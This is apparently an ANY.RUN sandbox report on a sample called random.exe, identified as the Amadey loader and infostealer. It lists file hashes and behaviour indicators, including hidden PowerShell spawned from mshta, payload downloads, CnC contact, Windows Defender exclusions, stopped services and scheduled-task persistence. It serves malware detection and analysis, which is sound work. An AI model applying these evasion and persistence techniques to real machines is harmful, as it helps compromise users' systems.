File name:

random.exe

Full analysis: https://app.any.run/tasks/4c9516c2-f51c-41f7-ad43-7e2a0f1ea3f0
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 17, 2025, 01:17:09
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
amadey
botnet
stealer
arch-exec
rdp
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

BFF537F368CF413F3D6D6D9481B1ED50

SHA1:

94E4CBE94FF75A61ECD488FDA24D3A912AF17C3D

SHA256:

A3E7F1BA520DFBD12254F71AFF326E6B259DD00B8D147D60B08B4E93B43F8EB5

SSDEEP:

49152:ePPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtB7Xo:8P/mp7t3T4+B/btosJwIA4hHmZlKH2T/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 7976)
      • cmd.exe (PID: 6324)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 8604)
      • cmd.exe (PID: 7780)
      • cmd.exe (PID: 7604)
      • cmd.exe (PID: 1040)
      • cmd.exe (PID: 536)
      • cmd.exe (PID: 300)
      • cmd.exe (PID: 6476)
      • cmd.exe (PID: 5668)
      • cmd.exe (PID: 7332)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 8928)
      • cmd.exe (PID: 8512)
      • cmd.exe (PID: 8104)
      • cmd.exe (PID: 9608)
      • cmd.exe (PID: 1004)
      • cmd.exe (PID: 3804)
      • cmd.exe (PID: 9388)
      • cmd.exe (PID: 3768)
      • cmd.exe (PID: 9892)
      • cmd.exe (PID: 9672)
      • cmd.exe (PID: 10772)
      • cmd.exe (PID: 9396)
      • cmd.exe (PID: 4008)
      • cmd.exe (PID: 720)
      • cmd.exe (PID: 9472)
      • cmd.exe (PID: 10532)
      • cmd.exe (PID: 9824)
      • cmd.exe (PID: 9380)
      • cmd.exe (PID: 12092)
      • cmd.exe (PID: 10792)
      • cmd.exe (PID: 11420)
      • cmd.exe (PID: 11176)
      • cmd.exe (PID: 11636)
      • cmd.exe (PID: 11344)
      • cmd.exe (PID: 11908)
      • cmd.exe (PID: 10728)
      • cmd.exe (PID: 12492)
      • cmd.exe (PID: 8916)
      • cmd.exe (PID: 12964)
      • cmd.exe (PID: 12956)
      • cmd.exe (PID: 13080)
      • cmd.exe (PID: 10360)
      • cmd.exe (PID: 12556)
      • cmd.exe (PID: 14732)
      • cmd.exe (PID: 7936)
      • cmd.exe (PID: 17160)
      • cmd.exe (PID: 16308)
      • cmd.exe (PID: 12504)
      • cmd.exe (PID: 10676)
      • cmd.exe (PID: 15976)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1280)
      • powershell.exe (PID: 668)
      • powershell.exe (PID: 4224)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 9736)
      • powershell.exe (PID: 10412)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 10684)
      • powershell.exe (PID: 10968)
      • powershell.exe (PID: 11208)
      • powershell.exe (PID: 10644)
      • powershell.exe (PID: 11368)
      • powershell.exe (PID: 11536)
      • powershell.exe (PID: 11832)
      • powershell.exe (PID: 11892)
      • powershell.exe (PID: 11736)
      • powershell.exe (PID: 12156)
      • powershell.exe (PID: 10436)
      • powershell.exe (PID: 11904)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7328)
      • powershell.exe (PID: 12424)
      • powershell.exe (PID: 12320)
      • powershell.exe (PID: 12736)
      • powershell.exe (PID: 12788)
      • powershell.exe (PID: 12840)
      • powershell.exe (PID: 12988)
      • powershell.exe (PID: 12948)
      • powershell.exe (PID: 13052)
      • powershell.exe (PID: 9760)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 13124)
      • powershell.exe (PID: 12340)
      • powershell.exe (PID: 9776)
      • powershell.exe (PID: 10608)
      • powershell.exe (PID: 10944)
      • powershell.exe (PID: 11776)
      • powershell.exe (PID: 6480)
      • powershell.exe (PID: 6824)
      • powershell.exe (PID: 13812)
      • powershell.exe (PID: 13376)
      • powershell.exe (PID: 13976)
      • powershell.exe (PID: 13824)
      • powershell.exe (PID: 13832)
      • powershell.exe (PID: 8648)
      • powershell.exe (PID: 9660)
      • powershell.exe (PID: 4228)
      • powershell.exe (PID: 13932)
      • powershell.exe (PID: 14028)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 11160)
      • powershell.exe (PID: 7212)
      • powershell.exe (PID: 14420)
      • powershell.exe (PID: 14756)
      • powershell.exe (PID: 15056)
      • powershell.exe (PID: 11504)
      • powershell.exe (PID: 14632)
      • powershell.exe (PID: 15184)
      • powershell.exe (PID: 11840)
      • powershell.exe (PID: 11340)
      • powershell.exe (PID: 15628)
      • powershell.exe (PID: 15680)
      • powershell.exe (PID: 10308)
      • powershell.exe (PID: 15824)
      • powershell.exe (PID: 15932)
      • powershell.exe (PID: 15780)
      • powershell.exe (PID: 12580)
      • powershell.exe (PID: 16404)
      • powershell.exe (PID: 19000)
      • powershell.exe (PID: 19020)
      • powershell.exe (PID: 19084)
      • powershell.exe (PID: 19008)
      • powershell.exe (PID: 11900)
      • powershell.exe (PID: 17636)
      • powershell.exe (PID: 16724)
      • powershell.exe (PID: 10156)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1280)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 1280)
      • powershell.exe (PID: 668)
    • AMADEY mutex has been found

      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 1184)
    • Connects to the CnC server

      • ramez.exe (PID: 1184)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6512)
      • NSudoLG.exe (PID: 4336)
    • Changes Windows Defender settings

      • NSudoLG.exe (PID: 4336)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 1184)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 6512)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • random.exe (PID: 2284)
      • 1fad10fb3b.exe (PID: 7756)
      • cmd.exe (PID: 7668)
      • nircmd.exe (PID: 736)
      • cmd.exe (PID: 6068)
      • NSudoLG.exe (PID: 5956)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 6512)
      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
      • Unlocker.exe (PID: 9072)
      • file.exe (PID: 8424)
      • file.exe (PID: 8096)
      • file.exe (PID: 8260)
      • file.exe (PID: 5796)
      • file.exe (PID: 4016)
      • file.exe (PID: 7740)
      • file.exe (PID: 8584)
      • file.exe (PID: 9168)
      • file.exe (PID: 7992)
      • file.exe (PID: 7712)
      • file.exe (PID: 1240)
      • file.exe (PID: 8408)
      • file.exe (PID: 8040)
      • file.exe (PID: 6036)
      • file.exe (PID: 6644)
      • file.exe (PID: 640)
      • file.exe (PID: 5988)
      • file.exe (PID: 6516)
      • file.exe (PID: 5232)
      • file.exe (PID: 8120)
      • file.exe (PID: 7188)
      • file.exe (PID: 3020)
      • file.exe (PID: 7572)
      • file.exe (PID: 6436)
      • file.exe (PID: 7508)
      • file.exe (PID: 9312)
      • file.exe (PID: 7652)
      • file.exe (PID: 10212)
      • file.exe (PID: 9328)
      • file.exe (PID: 7216)
      • file.exe (PID: 9600)
      • file.exe (PID: 10464)
      • file.exe (PID: 10744)
      • file.exe (PID: 11216)
      • file.exe (PID: 11032)
      • file.exe (PID: 11284)
      • file.exe (PID: 10976)
      • file.exe (PID: 11384)
      • file.exe (PID: 12000)
      • file.exe (PID: 11808)
      • file.exe (PID: 12212)
      • file.exe (PID: 12616)
      • file.exe (PID: 12572)
      • file.exe (PID: 12780)
      • file.exe (PID: 11064)
      • file.exe (PID: 14460)
      • file.exe (PID: 13172)
      • file.exe (PID: 16120)
      • file.exe (PID: 16128)
      • file.exe (PID: 16276)
      • file.exe (PID: 12636)
      • file.exe (PID: 11432)
      • file.exe (PID: 9352)
      • file.exe (PID: 13240)
      • file.exe (PID: 15636)
      • file.exe (PID: 16280)
      • file.exe (PID: 10356)
      • file.exe (PID: 1668)
      • file.exe (PID: 15432)
      • file.exe (PID: 11556)
      • file.exe (PID: 2984)
      • file.exe (PID: 14816)
      • file.exe (PID: 16924)
      • file.exe (PID: 14112)
      • file.exe (PID: 17888)
      • file.exe (PID: 12888)
      • file.exe (PID: 17232)
      • file.exe (PID: 8180)
      • file.exe (PID: 10912)
      • file.exe (PID: 17356)
      • file.exe (PID: 18016)
      • file.exe (PID: 18504)
    • Found IP address in command line

      • powershell.exe (PID: 1280)
      • powershell.exe (PID: 668)
      • powershell.exe (PID: 4224)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 9736)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 10684)
      • powershell.exe (PID: 10412)
      • powershell.exe (PID: 10968)
      • powershell.exe (PID: 10644)
      • powershell.exe (PID: 11368)
      • powershell.exe (PID: 11208)
      • powershell.exe (PID: 11536)
      • powershell.exe (PID: 11736)
      • powershell.exe (PID: 11832)
      • powershell.exe (PID: 11892)
      • powershell.exe (PID: 12156)
      • powershell.exe (PID: 10436)
      • powershell.exe (PID: 11904)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 7328)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 12320)
      • powershell.exe (PID: 12424)
      • powershell.exe (PID: 12788)
      • powershell.exe (PID: 12736)
      • powershell.exe (PID: 12840)
      • powershell.exe (PID: 12948)
      • powershell.exe (PID: 12988)
      • powershell.exe (PID: 13124)
      • powershell.exe (PID: 9760)
      • powershell.exe (PID: 13052)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 9776)
      • powershell.exe (PID: 12340)
      • powershell.exe (PID: 10944)
      • powershell.exe (PID: 11776)
      • powershell.exe (PID: 6480)
      • powershell.exe (PID: 10608)
      • powershell.exe (PID: 6824)
      • powershell.exe (PID: 13376)
      • powershell.exe (PID: 13812)
      • powershell.exe (PID: 13824)
      • powershell.exe (PID: 13832)
      • powershell.exe (PID: 13976)
      • powershell.exe (PID: 8648)
      • powershell.exe (PID: 4228)
      • powershell.exe (PID: 9660)
      • powershell.exe (PID: 13932)
      • powershell.exe (PID: 14028)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 11160)
      • powershell.exe (PID: 7212)
      • powershell.exe (PID: 14420)
      • powershell.exe (PID: 14756)
      • powershell.exe (PID: 15056)
      • powershell.exe (PID: 11504)
      • powershell.exe (PID: 14632)
      • powershell.exe (PID: 15184)
      • powershell.exe (PID: 11840)
      • powershell.exe (PID: 11340)
      • powershell.exe (PID: 10308)
      • powershell.exe (PID: 15628)
      • powershell.exe (PID: 15680)
      • powershell.exe (PID: 15824)
      • powershell.exe (PID: 15932)
      • powershell.exe (PID: 15780)
      • powershell.exe (PID: 12580)
      • powershell.exe (PID: 16404)
      • powershell.exe (PID: 19000)
      • powershell.exe (PID: 19020)
      • powershell.exe (PID: 19008)
      • powershell.exe (PID: 11900)
      • powershell.exe (PID: 19084)
      • powershell.exe (PID: 16724)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 17636)
    • Probably download files using WebClient

      • mshta.exe (PID: 5668)
      • mshta.exe (PID: 8132)
      • mshta.exe (PID: 8492)
      • mshta.exe (PID: 6372)
      • mshta.exe (PID: 8524)
      • mshta.exe (PID: 7640)
      • mshta.exe (PID: 5164)
      • mshta.exe (PID: 4932)
      • mshta.exe (PID: 4244)
      • mshta.exe (PID: 4040)
      • mshta.exe (PID: 7352)
      • mshta.exe (PID: 9132)
      • mshta.exe (PID: 8496)
      • mshta.exe (PID: 8844)
      • mshta.exe (PID: 8948)
      • mshta.exe (PID: 5556)
      • mshta.exe (PID: 7280)
      • mshta.exe (PID: 3028)
      • mshta.exe (PID: 9836)
      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4000)
      • mshta.exe (PID: 9404)
      • mshta.exe (PID: 7364)
      • mshta.exe (PID: 9412)
      • mshta.exe (PID: 9480)
      • mshta.exe (PID: 9616)
      • mshta.exe (PID: 9420)
      • mshta.exe (PID: 10244)
      • mshta.exe (PID: 10544)
      • mshta.exe (PID: 11352)
      • mshta.exe (PID: 9688)
      • mshta.exe (PID: 9900)
      • mshta.exe (PID: 10780)
      • mshta.exe (PID: 11184)
      • mshta.exe (PID: 10800)
      • mshta.exe (PID: 10836)
      • mshta.exe (PID: 11428)
      • mshta.exe (PID: 11660)
      • mshta.exe (PID: 4208)
      • mshta.exe (PID: 12100)
      • mshta.exe (PID: 11916)
      • mshta.exe (PID: 12500)
      • mshta.exe (PID: 13088)
      • mshta.exe (PID: 12980)
      • mshta.exe (PID: 12972)
      • mshta.exe (PID: 10960)
      • mshta.exe (PID: 14740)
      • mshta.exe (PID: 1188)
      • mshta.exe (PID: 16316)
      • mshta.exe (PID: 7104)
      • mshta.exe (PID: 9936)
      • mshta.exe (PID: 12380)
      • mshta.exe (PID: 16472)
      • mshta.exe (PID: 8508)
      • mshta.exe (PID: 14284)
      • mshta.exe (PID: 16456)
    • Manipulates environment variables

      • powershell.exe (PID: 1280)
      • powershell.exe (PID: 668)
      • powershell.exe (PID: 4224)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 9736)
      • powershell.exe (PID: 10412)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 10684)
      • powershell.exe (PID: 11208)
      • powershell.exe (PID: 10968)
      • powershell.exe (PID: 10644)
      • powershell.exe (PID: 11368)
      • powershell.exe (PID: 11536)
      • powershell.exe (PID: 11736)
      • powershell.exe (PID: 11832)
      • powershell.exe (PID: 11892)
      • powershell.exe (PID: 12156)
      • powershell.exe (PID: 10436)
      • powershell.exe (PID: 11904)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 7328)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 12424)
      • powershell.exe (PID: 12320)
      • powershell.exe (PID: 12736)
      • powershell.exe (PID: 12788)
      • powershell.exe (PID: 12840)
      • powershell.exe (PID: 13052)
      • powershell.exe (PID: 12948)
      • powershell.exe (PID: 12988)
      • powershell.exe (PID: 13124)
      • powershell.exe (PID: 9760)
      • powershell.exe (PID: 12340)
      • powershell.exe (PID: 9776)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 10944)
      • powershell.exe (PID: 11776)
      • powershell.exe (PID: 6480)
      • powershell.exe (PID: 10608)
      • powershell.exe (PID: 6824)
      • powershell.exe (PID: 13376)
      • powershell.exe (PID: 13812)
      • powershell.exe (PID: 13824)
      • powershell.exe (PID: 13832)
      • powershell.exe (PID: 13976)
      • powershell.exe (PID: 9660)
      • powershell.exe (PID: 8648)
      • powershell.exe (PID: 4228)
      • powershell.exe (PID: 13932)
      • powershell.exe (PID: 14028)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 11160)
      • powershell.exe (PID: 7212)
      • powershell.exe (PID: 14420)
      • powershell.exe (PID: 14756)
      • powershell.exe (PID: 15056)
      • powershell.exe (PID: 11504)
      • powershell.exe (PID: 14632)
      • powershell.exe (PID: 11340)
      • powershell.exe (PID: 15184)
      • powershell.exe (PID: 11840)
      • powershell.exe (PID: 10308)
      • powershell.exe (PID: 15628)
      • powershell.exe (PID: 15680)
      • powershell.exe (PID: 15824)
      • powershell.exe (PID: 15932)
      • powershell.exe (PID: 15780)
      • powershell.exe (PID: 12580)
      • powershell.exe (PID: 16404)
      • powershell.exe (PID: 19000)
      • powershell.exe (PID: 19008)
      • powershell.exe (PID: 19020)
      • powershell.exe (PID: 19084)
      • powershell.exe (PID: 11900)
      • powershell.exe (PID: 16724)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 17636)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 5668)
      • NSudoLG.exe (PID: 4336)
      • mshta.exe (PID: 8132)
      • mshta.exe (PID: 8492)
      • mshta.exe (PID: 6372)
      • mshta.exe (PID: 8524)
      • mshta.exe (PID: 7640)
      • mshta.exe (PID: 5164)
      • mshta.exe (PID: 4932)
      • mshta.exe (PID: 4244)
      • mshta.exe (PID: 4040)
      • mshta.exe (PID: 7352)
      • mshta.exe (PID: 8496)
      • mshta.exe (PID: 9132)
      • mshta.exe (PID: 8844)
      • mshta.exe (PID: 7280)
      • mshta.exe (PID: 5556)
      • mshta.exe (PID: 8948)
      • mshta.exe (PID: 9836)
      • mshta.exe (PID: 3028)
      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 9404)
      • mshta.exe (PID: 4000)
      • mshta.exe (PID: 7364)
      • mshta.exe (PID: 9480)
      • mshta.exe (PID: 9412)
      • mshta.exe (PID: 9616)
      • mshta.exe (PID: 9420)
      • mshta.exe (PID: 10544)
      • mshta.exe (PID: 10244)
      • mshta.exe (PID: 11352)
      • mshta.exe (PID: 9688)
      • mshta.exe (PID: 10780)
      • mshta.exe (PID: 9900)
      • mshta.exe (PID: 11184)
      • mshta.exe (PID: 10800)
      • mshta.exe (PID: 10836)
      • mshta.exe (PID: 11428)
      • mshta.exe (PID: 11660)
      • mshta.exe (PID: 4208)
      • mshta.exe (PID: 12100)
      • mshta.exe (PID: 11916)
      • mshta.exe (PID: 12500)
      • mshta.exe (PID: 13088)
      • mshta.exe (PID: 12980)
      • mshta.exe (PID: 12972)
      • mshta.exe (PID: 10960)
      • mshta.exe (PID: 14740)
      • mshta.exe (PID: 1188)
      • mshta.exe (PID: 16316)
      • mshta.exe (PID: 9936)
      • mshta.exe (PID: 7104)
      • mshta.exe (PID: 16472)
      • mshta.exe (PID: 16456)
      • mshta.exe (PID: 12380)
      • mshta.exe (PID: 8508)
      • mshta.exe (PID: 14284)
    • Starts process via Powershell

      • powershell.exe (PID: 1280)
      • powershell.exe (PID: 668)
      • powershell.exe (PID: 4224)
      • powershell.exe (PID: 8036)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 9736)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 10412)
      • powershell.exe (PID: 10684)
      • powershell.exe (PID: 10968)
      • powershell.exe (PID: 11208)
      • powershell.exe (PID: 10644)
      • powershell.exe (PID: 11368)
      • powershell.exe (PID: 11536)
      • powershell.exe (PID: 11736)
      • powershell.exe (PID: 11832)
      • powershell.exe (PID: 11892)
      • powershell.exe (PID: 12156)
      • powershell.exe (PID: 10436)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11904)
      • powershell.exe (PID: 7328)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 12320)
      • powershell.exe (PID: 12424)
      • powershell.exe (PID: 12788)
      • powershell.exe (PID: 12736)
      • powershell.exe (PID: 12840)
      • powershell.exe (PID: 13052)
      • powershell.exe (PID: 12948)
      • powershell.exe (PID: 12988)
      • powershell.exe (PID: 13124)
      • powershell.exe (PID: 9760)
      • powershell.exe (PID: 9540)
      • powershell.exe (PID: 12340)
      • powershell.exe (PID: 9776)
      • powershell.exe (PID: 10608)
      • powershell.exe (PID: 10944)
      • powershell.exe (PID: 11776)
      • powershell.exe (PID: 6480)
      • powershell.exe (PID: 6824)
      • powershell.exe (PID: 13376)
      • powershell.exe (PID: 13812)
      • powershell.exe (PID: 13824)
      • powershell.exe (PID: 13832)
      • powershell.exe (PID: 13976)
      • powershell.exe (PID: 9660)
      • powershell.exe (PID: 4228)
      • powershell.exe (PID: 8648)
      • powershell.exe (PID: 14028)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 13932)
      • powershell.exe (PID: 7212)
      • powershell.exe (PID: 14420)
      • powershell.exe (PID: 11160)
      • powershell.exe (PID: 11504)
      • powershell.exe (PID: 14756)
      • powershell.exe (PID: 15056)
      • powershell.exe (PID: 15184)
      • powershell.exe (PID: 11840)
      • powershell.exe (PID: 11340)
      • powershell.exe (PID: 14632)
      • powershell.exe (PID: 15628)
      • powershell.exe (PID: 15680)
      • powershell.exe (PID: 15932)
      • powershell.exe (PID: 15780)
      • powershell.exe (PID: 15824)
      • powershell.exe (PID: 10308)
      • powershell.exe (PID: 12580)
      • powershell.exe (PID: 16404)
      • powershell.exe (PID: 19000)
      • powershell.exe (PID: 19008)
      • powershell.exe (PID: 19084)
      • powershell.exe (PID: 19020)
      • powershell.exe (PID: 11900)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 17636)
      • powershell.exe (PID: 16724)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1280)
      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
      • 1fad10fb3b.exe (PID: 7756)
      • 7z.exe (PID: 6080)
      • Unlocker.exe (PID: 7800)
      • cmd.exe (PID: 6512)
      • powershell.exe (PID: 668)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 1280)
      • ramez.exe (PID: 1184)
      • powershell.exe (PID: 668)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 1280)
      • ramez.exe (PID: 1184)
      • powershell.exe (PID: 668)
    • Connects to the server without a host name

      • powershell.exe (PID: 1280)
      • ramez.exe (PID: 1184)
      • powershell.exe (PID: 668)
    • Reads security settings of Internet Explorer

      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
      • 1fad10fb3b.exe (PID: 7756)
      • nircmd.exe (PID: 736)
      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
    • Starts itself from another location

      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
    • Drops 7-zip archiver for unpacking

      • 1fad10fb3b.exe (PID: 7756)
    • The process creates files with name similar to system file names

      • 1fad10fb3b.exe (PID: 7756)
    • Executing commands from a ".bat" file

      • 1fad10fb3b.exe (PID: 7756)
      • nircmd.exe (PID: 736)
      • cmd.exe (PID: 7668)
      • NSudoLG.exe (PID: 5956)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 6068)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 1184)
    • Application launched itself

      • cmd.exe (PID: 7668)
      • cmd.exe (PID: 6068)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 6512)
    • Starts application with an unusual extension

      • cmd.exe (PID: 5304)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 1764)
    • Reads the date of Windows installation

      • nircmd.exe (PID: 736)
      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
    • The executable file from the user directory is run by the CMD process

      • nircmd.exe (PID: 736)
      • NSudoLG.exe (PID: 5956)
      • NSudoLG.exe (PID: 4336)
      • 7z.exe (PID: 6080)
      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
      • Unlocker.exe (PID: 9072)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1764)
      • cmd.exe (PID: 6512)
    • Get information on the list of running processes

      • cmd.exe (PID: 6080)
      • cmd.exe (PID: 6512)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 5936)
    • Script adds exclusion path to Windows Defender

      • NSudoLG.exe (PID: 4336)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 1184)
    • There is functionality for taking screenshot (YARA)

      • ramez.exe (PID: 1184)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6512)
    • Windows service management via SC.EXE

      • sc.exe (PID: 5228)
      • sc.exe (PID: 8184)
      • sc.exe (PID: 8128)
      • sc.exe (PID: 2392)
      • sc.exe (PID: 6324)
      • sc.exe (PID: 7448)
      • sc.exe (PID: 6252)
      • sc.exe (PID: 8020)
      • sc.exe (PID: 2532)
      • sc.exe (PID: 7948)
      • sc.exe (PID: 6656)
      • sc.exe (PID: 7252)
      • sc.exe (PID: 6156)
      • sc.exe (PID: 5736)
      • sc.exe (PID: 2424)
      • sc.exe (PID: 2488)
      • sc.exe (PID: 6268)
      • sc.exe (PID: 5200)
      • sc.exe (PID: 6828)
      • sc.exe (PID: 7200)
      • sc.exe (PID: 6744)
      • sc.exe (PID: 4736)
      • sc.exe (PID: 5036)
      • sc.exe (PID: 5360)
      • sc.exe (PID: 8012)
      • sc.exe (PID: 2516)
      • sc.exe (PID: 140)
      • sc.exe (PID: 8016)
      • sc.exe (PID: 8292)
      • sc.exe (PID: 8248)
      • sc.exe (PID: 8332)
      • sc.exe (PID: 8376)
      • sc.exe (PID: 7688)
      • sc.exe (PID: 5592)
      • sc.exe (PID: 8208)
      • sc.exe (PID: 9196)
      • sc.exe (PID: 8416)
      • sc.exe (PID: 8460)
      • sc.exe (PID: 8500)
      • sc.exe (PID: 8364)
      • sc.exe (PID: 8412)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 7772)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 968)
      • cmd.exe (PID: 8164)
      • cmd.exe (PID: 9140)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2432)
      • cmd.exe (PID: 3844)
      • cmd.exe (PID: 8200)
    • Drops a system driver (possible attempt to evade defenses)

      • Unlocker.exe (PID: 7800)
    • Creates or modifies Windows services

      • Unlocker.exe (PID: 7800)
    • Stops a currently running service

      • sc.exe (PID: 5436)
      • sc.exe (PID: 7144)
      • sc.exe (PID: 7924)
      • sc.exe (PID: 7020)
      • sc.exe (PID: 2444)
      • sc.exe (PID: 5576)
      • sc.exe (PID: 7496)
      • sc.exe (PID: 5132)
      • sc.exe (PID: 2412)
      • sc.exe (PID: 7952)
      • sc.exe (PID: 2400)
      • sc.exe (PID: 3848)
      • sc.exe (PID: 8228)
      • sc.exe (PID: 8312)
      • sc.exe (PID: 6576)
      • sc.exe (PID: 8396)
      • sc.exe (PID: 8480)
    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 8636)
      • schtasks.exe (PID: 8544)
      • schtasks.exe (PID: 8568)
      • schtasks.exe (PID: 8612)
      • schtasks.exe (PID: 8592)
    • Process drops legitimate windows executable

      • cmd.exe (PID: 6512)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 8724)
      • ramez.exe (PID: 16044)
  • INFO

    • Create files in a temporary directory

      • random.exe (PID: 2284)
      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
      • 1fad10fb3b.exe (PID: 7756)
      • 7z.exe (PID: 6080)
    • Reads mouse settings

      • random.exe (PID: 2284)
    • Checks supported languages

      • random.exe (PID: 2284)
      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
      • 1fad10fb3b.exe (PID: 7756)
      • chcp.com (PID: 1040)
      • nircmd.exe (PID: 736)
      • chcp.com (PID: 1072)
      • NSudoLG.exe (PID: 5956)
      • chcp.com (PID: 300)
      • mode.com (PID: 8088)
      • NSudoLG.exe (PID: 4336)
      • 7z.exe (PID: 6080)
      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
      • IObitUnlocker.exe (PID: 6640)
      • IObitUnlocker.exe (PID: 2432)
    • The sample compiled with english language support

      • random.exe (PID: 2284)
      • 1fad10fb3b.exe (PID: 7756)
      • Unlocker.exe (PID: 7800)
      • cmd.exe (PID: 6512)
    • Reads the computer name

      • random.exe (PID: 2284)
      • ramez.exe (PID: 1184)
      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • 1fad10fb3b.exe (PID: 7756)
      • nircmd.exe (PID: 736)
      • NSudoLG.exe (PID: 5956)
      • NSudoLG.exe (PID: 4336)
      • 7z.exe (PID: 6080)
      • Unlocker.exe (PID: 3140)
      • IObitUnlocker.exe (PID: 6640)
      • IObitUnlocker.exe (PID: 2432)
      • Unlocker.exe (PID: 7800)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 5668)
    • Manual execution by a user

      • firefox.exe (PID: 780)
      • firefox.exe (PID: 8792)
      • file.exe (PID: 8424)
      • file.exe (PID: 5796)
      • file.exe (PID: 4016)
      • file.exe (PID: 7992)
      • file.exe (PID: 1240)
      • file.exe (PID: 8584)
      • file.exe (PID: 8096)
      • file.exe (PID: 8260)
      • file.exe (PID: 7712)
      • file.exe (PID: 7740)
      • file.exe (PID: 6516)
      • file.exe (PID: 6036)
      • file.exe (PID: 8040)
      • file.exe (PID: 640)
      • file.exe (PID: 9168)
      • file.exe (PID: 8408)
      • file.exe (PID: 5988)
      • file.exe (PID: 6644)
      • file.exe (PID: 5232)
      • file.exe (PID: 8120)
      • file.exe (PID: 3020)
      • file.exe (PID: 7188)
      • file.exe (PID: 6436)
      • file.exe (PID: 7652)
      • file.exe (PID: 9312)
      • file.exe (PID: 9328)
      • file.exe (PID: 7572)
      • file.exe (PID: 7508)
      • file.exe (PID: 10212)
      • file.exe (PID: 7216)
      • file.exe (PID: 9600)
      • file.exe (PID: 10464)
      • file.exe (PID: 10744)
      • file.exe (PID: 10976)
      • file.exe (PID: 11032)
      • file.exe (PID: 11284)
      • file.exe (PID: 11216)
      • file.exe (PID: 11384)
      • file.exe (PID: 11808)
      • file.exe (PID: 12000)
      • file.exe (PID: 12212)
      • file.exe (PID: 12572)
      • file.exe (PID: 12616)
